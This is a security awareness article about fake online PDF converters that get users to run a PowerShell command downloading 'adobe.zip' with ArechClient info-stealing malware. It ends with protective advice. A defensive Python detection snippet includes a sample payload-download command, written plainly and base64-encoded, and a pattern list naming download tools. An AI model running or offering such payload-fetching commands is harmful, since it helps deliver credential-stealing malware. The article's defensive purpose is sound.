A growing threat is targeting unsuspecting internet users through fake PDF conversion tools, with hackers using these deceptive services to spread malware and steal sensitive information. Cybercriminals are increasingly exploiting the popularity of online file conversion, particularly PDF to Word (DOCX) conversions, to distribute information-stealing malware. Security experts and law enforcement agencies are warning users to be cautious when using free online file converters.
The scheme often begins with users searching for a free online tool to convert files, such as a PDF to a DOCX document. Cybercriminals create websites that mimic legitimate file conversion services, sometimes using similar-looking domain names and user interfaces to further deceive users. These fake websites prompt users to upload a PDF file for conversion, and to gain the user's trust, they display an animated loading sequence. Some sites also include a CAPTCHA verification step, which further enhances the perceived legitimacy of the website.
Once the user completes the CAPTCHA, the fake website prompts them to run a PowerShell command on their system. This is a critical step in the attack, as it initiates the malware delivery process. When users run the command, a file, often named "adobe.zip" or something similar, is downloaded onto their system. This ZIP file contains the malware, which, in some cases, is the ArechClient malware, an information stealer that belongs to the SectopRAT family. This particular trojan has been active since 2019 and is designed to steal personal information, such as browser passwords and cryptocurrency wallet information.
The malware can also gather personally identifiable information (PII), including Social Security Numbers (SSN); financial information such as banking credentials; other passwords and session tokens that could allow the scammers to bypass multi-factor authentication (MFA); and email addresses.
Cybercriminals may pursue several scenarios once they have access to a user's system. They might encourage the user to download a tool to perform the conversion, but this tool is actually the malware itself. They might recommend installing a browser extension, which could be a browser hijacker or adware. In more sophisticated attacks, the converted file contains malware code that downloads and installs an information stealer, infecting the device of everyone who opens it.
To protect against these threats, users should exercise caution when using online file conversion services. It is important to verify the legitimacy of the website before uploading any files or running any commands. Look for signs of imitation, such as domain names that are slightly different from well-known services. Be wary of prompts to run PowerShell commands or download executable files.
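For defenders who collect process-creation logs, the PowerShell step described above can be triaged automatically. The following is an added example, not taken from any vendor or agency guidance: it flags PowerShell command lines that both perform a network download and name a ZIP archive, decoding `-EncodedCommand` arguments first. The event field names, the pattern list and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Heuristic patterns are assumptions for illustration, not a vendor rule set.
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile"
                      r"|start-bitstransfer|net\.webclient", re.I)
ARCHIVE = re.compile(r"[\w.\-]+\.zip\b", re.I)
ENCODED = re.compile(r"(?<!\S)-e(?:c|nc[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)


def expand_encoded(cmdline):
    """Append the decoded text of an -EncodedCommand argument (base64 of UTF-16LE)."""
    match = ENCODED.search(cmdline)
    if not match:
        return cmdline
    try:
        decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not decodable: judge the raw command line only
    return cmdline + " " + decoded


def triage(event):
    """Return reasons when a PowerShell process both downloads and names a ZIP."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    text = expand_encoded(event["command_line"])
    archive = ARCHIVE.search(text)
    if not (DOWNLOAD.search(text) and archive):
        return []
    return ["network download", "archive: " + archive.group(0).lower()]


def flagged(events):
    """Indexes of events worth an analyst's attention."""
    return [i for i, event in enumerate(events) if triage(event)]


# Constructed sample events; field names and the .invalid hosts are assumptions.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FETCH = "Invoke-WebRequest https://converter.invalid/adobe.zip -OutFile adobe.zip"
SAMPLE_EVENTS = [
    {"image": PS, "command_line": 'powershell -c "' + FETCH + '"'},
    {"image": PS, "command_line": "powershell -enc "
     + base64.b64encode(FETCH.encode("utf-16-le")).decode()},
    {"image": PS, "command_line": "powershell -c Compress-Archive C:\\Reports reports.zip"},
    {"image": r"C:\Tools\updater.exe", "command_line": "updater.exe https://vendor.invalid/u.zip"},
]

if __name__ == "__main__":
    print(flagged(SAMPLE_EVENTS))
```

Requiring both signals keeps routine archive handling and non-PowerShell updaters out of the results; a hit is a lead for review, not a verdict.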
If you suspect that you have been a victim of this scam, it is important to take immediate action. Contact your financial institutions, change all your passwords using a clean and trusted device, and report the incident to the FBI Internet Crime Complaint Center (IC3) at www.ic3.gov. Run an up-to-date antivirus scan to check for potentially malicious software installed by the scammers, or consider taking your computer to a professional specializing in virus and malware removal services. The best defense is to be aware and exercise caution online.